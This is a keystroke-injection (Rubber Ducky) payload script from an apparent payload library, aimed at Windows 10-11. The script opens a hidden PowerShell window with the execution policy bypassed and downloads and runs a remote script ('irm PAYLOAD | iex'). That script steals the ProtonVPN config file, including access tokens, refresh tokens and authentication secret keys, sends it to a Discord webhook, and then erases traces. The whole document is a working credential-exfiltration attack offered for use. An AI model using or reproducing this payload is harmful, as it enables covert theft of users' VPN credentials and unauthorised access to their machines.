Path: blob/master/payloads/library/exfiltration/ProtonVPN-config/payload.txt
2968 views
REM ###################################################################1REM # |2REM # Title : ProtonVPN-config-to-Discord-Exfiltration |3REM # Author : Aleff |4REM # Version : 1.0 |5REM # Category : Credentials, Exfiltration |6REM # Target : Windows 10-11 |7REM # |8REM ###################################################################910REM Title: ProtonVPN-config-to-Discord-Exfiltration11REM Author: Aleff12REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.13REM In the config file you can find a lot information about the user like:14REM - UserUid15REM - UserAccessToken16REM - UserRefreshToken17REM - UserAuthenticationPublicKey18REM - UserAuthenticationSecretKey19REM - UserAuthenticationCertificatePem20REM - UserCertificationServerPublicKey21REM - and so on...22REM Then it cleans up traces of what you have done after.23REM Target: Windows 10-11 (PowerShell + ProtonVPN software)24REM Version: 1.025REM Category: Credentials, Exfiltration26REM Requirements: ProtonVPN user logged at least one time and internet connection27REM2829REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>30DEFINE WEBHOOK example.com3132DELAY 200033GUI r34DELAY 25035DELETE36STRING powershell -w h -ep bypass $discord='37STRING WEBHOOK3839REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps140DEFINE PAYLOAD example.com41STRING ';irm PAYLOAD | iex42ENTER434445